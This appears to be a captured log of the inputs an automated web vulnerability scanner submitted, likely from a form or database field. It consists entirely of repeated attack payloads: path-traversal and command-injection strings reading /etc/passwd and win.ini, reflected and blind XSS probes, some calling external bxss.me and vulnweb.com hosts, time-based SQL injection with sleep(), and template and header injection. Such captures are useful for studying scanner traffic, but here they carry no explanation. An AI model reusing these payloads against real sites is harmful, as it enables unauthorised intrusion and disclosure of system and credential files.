..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

'|'ld

1

1

eHNg7AKf'

1<ScRiPt%20>prompt(937679)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

"|"ld

1

testasp.vulnweb.com

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

QU6j17eM')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

1

1

1

4sMXc5QA'))

1

'

1

'

1

/etc/passwd

\xf6<img acu onmouseover=prompt(965264) //\xf6>

1

http://hitPoki1dAn3N.bxss.me/

1

1

-1

"

acunetix_wvs_invalid_filename

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(988716)>

1

1

1

comments

-1)

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

-1))

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

tbZgx480'

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

[url=http://www.acunetix.com]website security[/url]

1

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

MVlxKM4r')

1

'&dir&'

1_ketiM <ScRiPt >prompt(927203)</ScRiPt>

'"

1

1

1

bNv3BlpA'))

1'"()&%<ScRiPt >prompt(965939)</ScRiPt>

1

<!--

1

"&dir&"

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(907752)</ScRiPt>

1

1

1

1

1

|dir

1

1_982021

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

WEB-INF/web.xml

1

1

acu1846\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1846

1

"|dir

1

WEB-INF\web.xml

acux9758\xc0\xbez1\xc0\xbcz2a\x90bcxuca9758

1

1

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(968203)</ScRiPt>

1

1

1<script>prompt(916723)</script>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(944438)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912798></ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(938329)</ScRiPt>

1

1

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(956925)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(914054)"></g></svg>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(927166))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1<body onload=prompt(900028)>

response.write(9834846*9181920)

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958681)>

'&cat /etc/passwd&'

1

'+response.write(9834846*9181920)+'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9834846*9181920)+"

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(979695)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img/src=">" onerror=alert(990885)>

1

cat /etc/passwd

-1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(951452)</sCripT>

1

${100230+99249}

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

|cat /etc/passwd#

1&n937140=v985936

-1))

1

1&lt

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

hYXGlnUP'

1

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(998804) //\xf6>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

Moh1LcLK')

"|"ld

!(()&&!|*|*|

/etc/passwd

'"()

1<input autofocus onfocus=prompt(984559)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'

^(#$!@#$)(()))******

hu4LADqv'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

"

'

1

-1

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

http://hitz8wjlyAqWa.bxss.me/

-1)

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

1_raYdY <ScRiPt >prompt(980798)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

comments

1

1

1

&dir

1

3mn6QU4v'

comments/.

1

1

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

9dPL4KhA')

1

1

1

1

gKZPxIO2'))

1

http://www.acunetix.tst

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

'"

1

1

|dir

1'"()&%<ScRiPt >prompt(945336)</ScRiPt>

1

WEB-INF/web.xml

1

<!--

1

WEB-INF\web.xml

1

'|dir

'"()&%<ScRiPt >prompt(903785)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

1_954861

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu8607\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8607

1

1

1

................windowswin.ini

acux3091\xc0\xbez1\xc0\xbcz2a\x90bcxuca3091

1

1

1

1<ScRiPt >prompt(953909)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(989395)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(924227)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987023></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(945422)</ScRiPt>

1

1

1

response.write(9120635*9506561)

1<video><source onerror="javascript:prompt(961157)">

1

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992497)"></g></svg>

'+response.write(9120635*9506561)+'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

"+response.write(9120635*9506561)+"

1<div style=width:expression(prompt(958464))>

1

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1<body onload=prompt(995215)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

${99178+100229}

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975628)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(987352)>

1

1&n931621=v993272

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

-1)

)

1<img/src=">" onerror=alert(914614)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

1<ScRiPt%20>prompt(934385)</sCripT>

!(()&&!|*|*|

'|'ld

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1&lt

^(#$!@#$)(()))******

/etc/passwd

testasp.vulnweb.com

"|"ld

AkB2suVN'

1

1

\xf6<img acu onmouseover=prompt(911467) //\xf6>

'"()

'

1

B1G769o0')

1

1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(944550)>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

TpSf6Pgx'))

'

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

<a href='http://www.acunetix.com'>website security</a>

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

acunetix_wvs_invalid_filename

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitSuvKpaa8ej.bxss.me/

1_QEBKc <ScRiPt >prompt(983365)</ScRiPt>

-1)

comments

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

-1))

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

'"

http://www.acunetix.tst

1

MTdVbIia'

'&dir&'

1

file:///etc/passwd

1

comments/.

1

g9RVdtra')

1

<!--

"&dir&"

1

Y6BLajEg'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(925063)</ScRiPt>

1

1

|dir

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(967859)</ScRiPt>

1

1

1

'|dir

1

WEB-INF\web.xml

1_918599

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8405\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8405

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

acux8838\xc0\xbez1\xc0\xbcz2a\x90bcxuca8838

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(950888)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(996226)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(907249)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?907433></ScRiPt>

1

1

1

1<ScRiPt >prompt(997613)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(970034)">

1

1

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905254)"></g></svg>

1

1

1

1<div style=width:expression(prompt(956119))>

1

1

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(937864)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936278)>

1

1<img src=xyz OnErRor=prompt(974656)>

1

1

1<img/src=">" onerror=alert(925484)>

1

1<ScRiPt%20>prompt(981009)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(963011) //\xf6>

1

1<input autofocus onfocus=prompt(963227)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1_9wWMg <ScRiPt >prompt(992584)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9028060*9106319)

1

1

'+response.write(9028060*9106319)+'

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9028060*9106319)+"

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

${100476+99252}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1&n907243=v919389

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1some_inexistent_file_with_long_name%00.jpg

1

|cat /etc/passwd#

-1)

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

'|'ld

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

1

deAOXyB3'

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

R7tA8pEn')

1

http://hitk3GqO54QYn.bxss.me/

1

1

/etc/passwd

"

1

'

1

qClBByOR'))

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

1

-1

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1)

comments

1

http://www.acunetix.tst

||cat /etc/passwd

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1'"()&%<ScRiPt >prompt(994542)</ScRiPt>

comments

'"

-1))

1

&dir

1

<!--

comments/.

'"()&%<ScRiPt >prompt(976684)</ScRiPt>

aZ4Q52LD'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

A8G78dsi')

1_929858

1

1

1

"&dir&"

1

1

H0rqC5Jx'))

|dir

file:///etc/passwd

1

'|dir

1

acu3234\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3234

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

acux9937\xc0\xbez1\xc0\xbcz2a\x90bcxuca9937

WEB-INF/web.xml

1

1

1<ScRiPt >prompt(954871)</ScRiPt>

WEB-INF\web.xml

1

1<script>prompt(904466)</script>

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(945938)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986899></ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(999930)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<video><source onerror="javascript:prompt(933968)">

response.write(9626483*9135934)

................windowswin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918682)"></g></svg>

'+response.write(9626483*9135934)+'

1

1<div style=width:expression(prompt(945330))>

..\..\..\..\..\..\..\..\windows\win.ini

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

1

"+response.write(9626483*9135934)+"

'&cat /etc/passwd&'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(950334)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959625)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd

-1

1<img src=xyz OnErRor=prompt(911444)>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99141+100071}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1&n938286=v917214

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(976409)>

1some_inexistent_file_with_long_name%00.jpg

-1))

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

1

1<ScRiPt%20>prompt(959006)</sCripT>

1

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

wKuY5nbJ'

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1&lt

1

testasp.vulnweb.com

'"()

rb7Iz46K')

1

'|'ld

1

\xf6<img acu onmouseover=prompt(967036) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

'

x1jjNinZ'))

1

1

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(977148)>

1

-1

"

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

-1)

<a href='http://www.acunetix.com'>website security</a>

1

'

1

1

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

"

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_8RQvI <ScRiPt >prompt(904534)</ScRiPt>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

A3JtHaNm'

1

1

http://hitb1Qubc9ElE.bxss.me/

1

1

t9oIiaK8')

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

comments

'&dir&'

'"

4eBNSL3U'))

http://www.acunetix.tst

1

"&dir&"

comments

file:///etc/passwd

1

1

1

<!--

1'"()&%<ScRiPt >prompt(995201)</ScRiPt>

|dir

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

'"()&%<ScRiPt >prompt(966042)</ScRiPt>

'|dir

1

1

1

1

1_912307

1

1

WEB-INF/web.xml

"|dir

1

acu10866\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10866

1

1

1

WEB-INF\web.xml

1

acux5906\xc0\xbez1\xc0\xbcz2a\x90bcxuca5906

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1<ScRiPt >prompt(921530)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(921064)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(925300)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?916978></ScRiPt>

1

1

1<ScRiPt >prompt(999393)</ScRiPt>

................windowswin.ini

1

1<video><source onerror="javascript:prompt(906181)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(971273)"></g></svg>

1

1

1

response.write(9420325*9962089)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(929910))>

1

1

'+response.write(9420325*9962089)+'

1

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

1

1

"+response.write(9420325*9962089)+"

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(922594)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(941386)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(963152)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

${99566+100236}

1

-1

1<img/src=">" onerror=alert(981930)>

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<ScRiPt%20>prompt(915196)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

`cat /etc/passwd`

-1)

1&lt

1

1

1&n954938=v985186

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

-1))

|cat /etc/passwd#

1

\xf6<img acu onmouseover=prompt(932311) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

testasp.vulnweb.com

1<input autofocus onfocus=prompt(924989)>

zcL3RtqI'

'|'ld

)

1

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

HLLqq047')

<a href='http://www.acunetix.com'>website security</a>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

'"()

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

N2KVF6tH'))

'

1

1

1

1

/etc/passwd

"

-1

1_vjq08 <ScRiPt >prompt(906095)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

1

'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

http://hiteDsila1Isx.bxss.me/

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

acunetix_wvs_invalid_filename

1

1

Ps6NPrbU'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

||cat /etc/passwd

1

tPrduRcf')

1

'"

comments

&dir

1

1

1

file:///etc/passwd

lBwbkNVl'))

<!--

1'"()&%<ScRiPt >prompt(927241)</ScRiPt>

1

1

'&dir&'

comments

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(930305)</ScRiPt>

1

1

1

comments/.

"&dir&"

1

1_994282

1

WEB-INF/web.xml

1

1

|dir

1

WEB-INF\web.xml

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu1478\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1478

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux8523\xc0\xbez1\xc0\xbcz2a\x90bcxuca8523

................windowswin.ini

1<ScRiPt >prompt(970673)</ScRiPt>

1

1

1

1<script>prompt(922651)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(960661)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925557></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(944703)</ScRiPt>

1

1

1

response.write(9215182*9157895)

1

1<video><source onerror="javascript:prompt(938891)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926448)"></g></svg>

1

1

WEB-INF/web.xml

'+response.write(9215182*9157895)+'

1

1

1<div style=width:expression(prompt(958696))>

&cat /etc/passwd&

WEB-INF\web.xml

1

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

"+response.write(9215182*9157895)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(980228)>

1

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953252)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

${100354+100009}

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<img src=xyz OnErRor=prompt(967623)>

1

1

